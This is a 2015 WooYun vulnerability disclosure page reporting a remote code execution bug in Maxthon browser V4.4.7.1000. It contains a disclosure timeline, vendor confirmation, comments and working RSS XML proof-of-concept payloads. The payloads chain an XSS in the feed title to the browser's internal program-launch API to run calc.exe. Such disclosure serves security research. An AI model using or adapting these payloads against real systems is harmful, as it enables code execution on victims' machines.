当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135071

漏洞标题:遨游浏览器远程代码执行(V4.4.7.1000)

相关厂商:傲游

漏洞作者: roker

提交时间:2015-08-18 17:50

修复时间:2015-11-16 18:28

公开时间:2015-11-16 18:28

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-18: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经确认,细节仅向厂商公开
2015-08-21: 细节向第三方安全合作伙伴开放
2015-10-12: 细节向核心白帽子及相关领域专家公开
2015-10-22: 细节向普通白帽子公开
2015-11-01: 细节向实习白帽子公开
2015-11-16: 细节向公众公开

简要描述:

官网下的最新版。
V4.4.7.1000。无条件
fuzz出奇迹。

详细说明:

ver.png


看了下往期的漏洞,大部分是在res处的。
这个漏洞还是在这个点。。
一顿fuzz后发现
如下代码弹框了~

<?xml version="1.0" encoding="utf-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" version="2.0">
<channel>
<title>&lt;img src=x onerror=alert(1)&gt;</title>
<link>x</link>
<description>x</description>
</channel>
</rss>


aler.png


看下location.href

loc.png


mx://res/app/%7B4F562E60-F24B-4728-AFDB-DA55CE1597FE%7D/preview.htm
然而这个路径是不允许 調用maxthon.program的。
那我们就 iframe 这个mx://res/notification/ 来調用。
最终poc

<?xml version="1.0" encoding="utf-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" version="2.0">
<channel>
<title>maxthon test page (V4.4.7.1000)&lt;img src=x onerror='var s=document.createElement("iframe");s.src="mx://res/notification/";s.onload=function(){s.contentWindow.maxthon.program.Program.launch("C:/windows/system32/calc.exe","")};document.body.appendChild(s);'&gt;</title>
<link>x</link>
<description>x</description>
</channel>
</rss>


ok,成功。

poc.png

漏洞证明:

ver.png


poc.png


测试地址 http://cm2.in/test.html
我服务器貌似配置有些问题 - -500错误的话 刷新几次就好了~

修复方案:

你们更加懂。

版权声明:转载请注明来源 roker@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-18 18:27

厂商回复:

漏过滤

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-18 17:52 | 不能忍 ( 实习白帽子 | Rank:71 漏洞数:37 | 要工作了。)

    fuzz出奇迹,666。。沙发,留名,说不定火了!

  2. 2015-08-18 17:54 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    爷爷

  3. 2015-08-18 17:59 | roker ( 普通白帽子 | Rank:372 漏洞数:109 )

    测试地址填错了- -麻烦审核更新下

  4. 2015-08-18 18:07 | 玉林嘎 ( 普通白帽子 | Rank:798 漏洞数:99 )

    我擦 全能牛